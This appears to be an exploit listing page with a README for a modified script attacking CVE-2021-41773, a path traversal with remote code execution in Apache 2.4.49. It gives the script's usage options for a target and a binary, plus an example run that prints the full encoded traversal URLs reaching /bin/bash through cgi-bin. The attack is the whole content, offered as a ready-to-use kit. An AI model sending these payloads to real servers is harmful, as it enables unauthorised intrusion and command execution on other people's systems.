Share
## https://sploitus.com/exploit?id=DBF996C3-DC2A-5859-B767-6B2FC38F2185
# CVE-2021-41773 ( Apache / 2.4.49 )
CVE-2021-41773 exploit by Gaurav Jav modified by Plunder in order to use custom exploit


Usage :

``` 
$ py exploit.py -h                              
usage: exploit.py [-h] -t TARGET [-b BINARY]

Apache2 2.4.49 Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Specify the target IP or Domain. eg: 127.0.0.1 or example.com
  -b BINARY, --binary BINARY
                        Specify the binary file to execute. eg: /bin/sh (/bin/sh by default)
```

exemple :

```
PS C:\Users\Mateo\Downloads\Apache 2.4.49 -- exploit kit> py exploit.py -t <ip> -b /bin/bash 
--------------------------------------------------------------------------------------------
|                                  Apache2 2.4.49 - Exploit                                |
|                                            Author : Gaurav Raj                           |
|                                            Modified by : Plunder                         |
--------------------------------------------------------------------------------------------

url : <ip>
binary used : /bin/bash
http path traversal url : http://<ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
https path traveral url (relative): https://<ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash

>>> 
```

Gurav Jave project : https://github.com/thehackersbrain/CVE-2021-41773